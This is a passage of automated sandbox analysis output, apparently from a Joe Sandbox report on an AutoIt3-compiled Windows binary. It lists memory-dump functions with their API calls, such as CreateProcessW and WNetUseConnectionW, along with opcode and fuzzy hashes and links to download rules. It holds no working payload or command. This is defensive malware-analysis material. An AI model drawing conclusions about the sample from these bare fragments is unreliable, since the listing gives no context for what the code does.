                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CounterPerformanceQuerySleep
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2875609808-0
                                                                                                                                • Opcode ID: a71025d351076eda22778cf85679c2b3e2f04f90f85d9e3692a21b2b01d5f3dd
                                                                                                                                • Instruction ID: 5dd7949374ae1ff179da1ebe11de11ba969995e77a385cb544ec9f30b2e4f52c
                                                                                                                                • Opcode Fuzzy Hash: a71025d351076eda22778cf85679c2b3e2f04f90f85d9e3692a21b2b01d5f3dd
                                                                                                                                • Instruction Fuzzy Hash: C0115E32D4051CDBDF04AFA4D949AEEBB78FF09716F100046EA41B2140CB34A594EB99
                                                                                                                                Function 00F45BA2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3016257755-0
                                                                                                                                • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                • Instruction ID: 9160fb85b1419b8ccf68a0cf6b96184005cab6815e3b44f1984aaba3736a0c3b
                                                                                                                                • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                                                                                • Instruction Fuzzy Hash: 62014E3240064EBBCF126E94DC41CEE3F62FB19750B588415FE1899132D336CAB1BB82
                                                                                                                                Function 00F380E2 Relevance: 6.0, APIs: 4, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F3869D: __getptd_noexit.LIBCMT ref: 00F3869E
                                                                                                                                • __lock.LIBCMT ref: 00F3811F
                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00F3813C
                                                                                                                                • _free.LIBCMT ref: 00F3814F
                                                                                                                                • InterlockedIncrement.KERNEL32(016D12A8), ref: 00F38167
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Interlocked$DecrementIncrement__getptd_noexit__lock_free
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2704283638-0
                                                                                                                                • Opcode ID: c4427a946b22a8fc35601f8330e7910e8fc4f86f063f8f3e2f317cd143e94753
                                                                                                                                • Instruction ID: 7a9d189df105a4d7821300420f21bed3b0d6a4d646e4d815d88d0008ac4259d8
                                                                                                                                • Opcode Fuzzy Hash: c4427a946b22a8fc35601f8330e7910e8fc4f86f063f8f3e2f317cd143e94753
                                                                                                                                • Instruction Fuzzy Hash: DE016932D01729ABCB22BF64990AB9DB760BF04BB5F140019F81467291CF2C6943FBD2
                                                                                                                                Function 00F38724 Relevance: 6.0, APIs: 4, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • __lock.LIBCMT ref: 00F38768
                                                                                                                                  • Part of subcall function 00F38984: __mtinitlocknum.LIBCMT ref: 00F38996
                                                                                                                                  • Part of subcall function 00F38984: RtlEnterCriticalSection.NTDLL(00F30127), ref: 00F389AF
                                                                                                                                • InterlockedIncrement.KERNEL32(DC840F00), ref: 00F38775
                                                                                                                                • __lock.LIBCMT ref: 00F38789
                                                                                                                                • ___addlocaleref.LIBCMT ref: 00F387A7
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1687444384-0
                                                                                                                                • Opcode ID: 1f6d049e93c7ab3695ed568f8d3174c5efffd15aae04b89a423da1694456f9d3
                                                                                                                                • Instruction ID: c9af16e6a832d6e8fb769fa3fb90b33a94c72a7e06846ae77122165a6b9e20db
                                                                                                                                • Opcode Fuzzy Hash: 1f6d049e93c7ab3695ed568f8d3174c5efffd15aae04b89a423da1694456f9d3
                                                                                                                                • Instruction Fuzzy Hash: D6015771405B05EEE720EF75C90675AF7F0AF40735F20890EE49A872A1CB78A641EB02
                                                                                                                                Function 00F7E13E Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • _memset.LIBCMT ref: 00F7E14D
                                                                                                                                • _memset.LIBCMT ref: 00F7E15C
                                                                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00FD3EE0,00FD3F24), ref: 00F7E18B
                                                                                                                                • CloseHandle.KERNEL32 ref: 00F7E19D
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3277943733-0
                                                                                                                                • Opcode ID: 276a8dd32f7bf1eecdc7d5efa8f66e8dfa303ca71929cdfbef3225ef07855d37
                                                                                                                                • Instruction ID: fe0668e275ee975b4189f53e67c8741425accd76052ccb480330216cc045f95e
                                                                                                                                • Opcode Fuzzy Hash: 276a8dd32f7bf1eecdc7d5efa8f66e8dfa303ca71929cdfbef3225ef07855d37
                                                                                                                                • Instruction Fuzzy Hash: 20F054F1941308BEF2105775AC06F777B6EDB093A4F044423BB04D5192D7B68E0076A5
                                                                                                                                Function 00F59C73 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • RtlEnterCriticalSection.NTDLL(?), ref: 00F59C7F
                                                                                                                                  • Part of subcall function 00F5AD14: _memset.LIBCMT ref: 00F5AD49
                                                                                                                                • _memmove.LIBCMT ref: 00F59CA2
                                                                                                                                • _memset.LIBCMT ref: 00F59CAF
                                                                                                                                • RtlLeaveCriticalSection.NTDLL(?), ref: 00F59CBF
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 48991266-0
                                                                                                                                • Opcode ID: 284561070e86c7d5f86ba0307281f6cfad58d8a47c1d818f585e0b4cd26e614d
                                                                                                                                • Instruction ID: 87d449f9c70c4cb50907b920367ebded2650560c57f33596ba65b52bde0cd8df
                                                                                                                                • Opcode Fuzzy Hash: 284561070e86c7d5f86ba0307281f6cfad58d8a47c1d818f585e0b4cd26e614d
                                                                                                                                • Instruction Fuzzy Hash: E5F05476201004ABCF016F54EC85E59BB29EF45361F18C062FE085E217C735E815EBB5
                                                                                                                                Function 00F7E83C Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F2B58B: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00F2B5EB
                                                                                                                                  • Part of subcall function 00F2B58B: SelectObject.GDI32(?,00000000), ref: 00F2B5FA
                                                                                                                                  • Part of subcall function 00F2B58B: BeginPath.GDI32(?), ref: 00F2B611
                                                                                                                                  • Part of subcall function 00F2B58B: SelectObject.GDI32(?,00000000), ref: 00F2B63B
                                                                                                                                • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00F7E860
                                                                                                                                • LineTo.GDI32(00000000,?,?), ref: 00F7E86D
                                                                                                                                • EndPath.GDI32(00000000), ref: 00F7E87D
                                                                                                                                • StrokePath.GDI32(00000000), ref: 00F7E88B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1539411459-0
                                                                                                                                • Opcode ID: e0fa104e443247222fcea1a9d344704136bcf30f3ba90b204c37ea64fe73c82f
                                                                                                                                • Instruction ID: 22760b7fa3aa3501627bf30257bcd2c64e3b3e7704821e01a25c3847711bd42b
                                                                                                                                • Opcode Fuzzy Hash: e0fa104e443247222fcea1a9d344704136bcf30f3ba90b204c37ea64fe73c82f
                                                                                                                                • Instruction Fuzzy Hash: 41F05E3200526DBADB125F54AC0AFCE3F9AAF0A321F148143FA15250E187795561FFA6
                                                                                                                                Function 00F4D623 Relevance: 6.0, APIs: 4, Instructions: 30threadwindowtimeCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00F4D640
                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 00F4D653
                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00F4D65A
                                                                                                                                • AttachThreadInput.USER32(00000000), ref: 00F4D661
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2710830443-0
                                                                                                                                • Opcode ID: abaa47ede89fa50957e1603aa8d0791feeca3e51a4bf494be70070289b114d81
                                                                                                                                • Instruction ID: 53e32d9f434d070c28a20e063613d78882d5b162236dcb70406c8e94e09fadd4
                                                                                                                                • Opcode Fuzzy Hash: abaa47ede89fa50957e1603aa8d0791feeca3e51a4bf494be70070289b114d81
                                                                                                                                • Instruction Fuzzy Hash: 82E06D3250122CBAEB201FA2DC0DFDB7F1CEF517B1F008012B90C85060CA729580EBA0
                                                                                                                                Function 00F2B0AC Relevance: 6.0, APIs: 4, Instructions: 22COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • GetSysColor.USER32(00000008), ref: 00F2B0C5
                                                                                                                                • SetTextColor.GDI32(?,000000FF), ref: 00F2B0CF
                                                                                                                                • SetBkMode.GDI32(?,00000001), ref: 00F2B0E4
                                                                                                                                • GetStockObject.GDI32(00000005), ref: 00F2B0EC
                                                                                                                                • GetWindowDC.USER32(?,00000000), ref: 00F8ECFA
                                                                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 00F8ED07
                                                                                                                                • GetPixel.GDI32(00000000,?,00000000), ref: 00F8ED20
                                                                                                                                • GetPixel.GDI32(00000000,00000000,?), ref: 00F8ED39
                                                                                                                                • GetPixel.GDI32(00000000,?,?), ref: 00F8ED59
                                                                                                                                • ReleaseDC.USER32(?,00000000), ref: 00F8ED64
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1946975507-0
                                                                                                                                • Opcode ID: 23fbb0ed62aaeceb04c4006d23e92ce3067f8bdbfa343f4710395f2ca7c8f25c
                                                                                                                                • Instruction ID: 78b2b365465b64f861eeecfda1644a00294c1a25c576e18bd9e569bb2e076270
                                                                                                                                • Opcode Fuzzy Hash: 23fbb0ed62aaeceb04c4006d23e92ce3067f8bdbfa343f4710395f2ca7c8f25c
                                                                                                                                • Instruction Fuzzy Hash: ADE0ED32900244AEEB215F74AC497D83B21AB56335F248266FB69580E2C7714995EB11
                                                                                                                                Function 00F8C0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                • Opcode ID: 1821c2a4836e34ce03147d88aafe12f0db626b0e5ef088e12308a6ddb0d78025
                                                                                                                                • Instruction ID: 09e5cab979ef241831dcdd78c054e2daf595d4429897f0e9bfe14989070d2a77
                                                                                                                                • Opcode Fuzzy Hash: 1821c2a4836e34ce03147d88aafe12f0db626b0e5ef088e12308a6ddb0d78025
                                                                                                                                • Instruction Fuzzy Hash: 24E0B6B6500218EFDB006F71DC48AA97BA9EF4C361F21C416FD4ACB251DAB99981AF50
                                                                                                                                Function 00F8C0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: CapsDesktopDeviceReleaseWindow
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2889604237-0
                                                                                                                                • Opcode ID: ac049a1b3b764da5739fc7fdeba39d71ef006ad11b9fd2bc1469476b858d2ad9
                                                                                                                                • Instruction ID: 99f5f21b818823d05d2219459ab3110ed2680965b51647bc2824c1ad698cec2f
                                                                                                                                • Opcode Fuzzy Hash: ac049a1b3b764da5739fc7fdeba39d71ef006ad11b9fd2bc1469476b858d2ad9
                                                                                                                                • Instruction Fuzzy Hash: 65E0B6B5500218EFDB009F71DC486697BA9EB4C361F218416F94A8B261DBB99981AF50
                                                                                                                                Function 00F92350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: _memmove
                                                                                                                                • String ID: >$DEFINE
                                                                                                                                • API String ID: 4104443479-1664449232
                                                                                                                                • Opcode ID: 5ffbabff3422bbe47271b4db20457566227386e1e379bb483a379530c8119859
                                                                                                                                • Instruction ID: ed81db05ddd178d62968ee2c58dc0f6858806a75e77d3c0b12e7ff56b487a60d
                                                                                                                                • Opcode Fuzzy Hash: 5ffbabff3422bbe47271b4db20457566227386e1e379bb483a379530c8119859
                                                                                                                                • Instruction Fuzzy Hash: 18124875E0020ADFDF24DF58C890AEDB7B1FF48324F25815AE859AB251D734AD81EB90
                                                                                                                                Function 00F4EAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                • OleSetContainedObject.OLE32(?,00000001), ref: 00F4ECA0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FCA000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FE4000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.000000000106D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3017910218.0000000001073000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3018052751.0000000001074000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_7_2_f10000_UNK_.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContainedObject
                                                                                                                                • String ID: AutoIt3GUI$Container
                                                                                                                                • API String ID: 3565006973-3941886329
                                                                                                                                • Opcode ID: 9e318bc5422fc1dfcd0cf4629cbdb5ce95b32c3a7408c24706c114ea25d0bbc2
                                                                                                                                • Instruction ID: bb4558f8a8f484ecce93302ff125432abd15ecbb040b8f10709ecc6bb6ba7f94
                                                                                                                                • Opcode Fuzzy Hash: 9e318bc5422fc1dfcd0cf4629cbdb5ce95b32c3a7408c24706c114ea25d0bbc2
                                                                                                                                • Instruction Fuzzy Hash: 96912774A00701AFDB14DF64C885B6ABBB5FF48710F24856EED4ACB291DBB0E845DB50
                                                                                                                                Function 00F5E704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                                                                                                                                Download Yara Rule
                                                                                                                                APIs
                                                                                                                                  • Part of subcall function 00F13BCF: _wcscpy.LIBCMT ref: 00F13BF2
                                                                                                                                  • Part of subcall function 00F184A6: __swprintf.LIBCMT ref: 00F184E5
                                                                                                                                  • Part of subcall function 00F184A6: __itow.LIBCMT ref: 00F18519
                                                                                                                                • __wcsnicmp.LIBCMT ref: 00F5E785
                                                                                                                                • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00F5E84E
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000007.00000002.3016674043.0000000000F11000.00000040.00000001.01000000.00000008.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                • Associated: 00000007.00000002.3016513039.0000000000F10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                • Associated: 00000007.00000002.3016674043.0000000000FBE000.00000040.00000001.01000000.00000008.sdmpDownload File
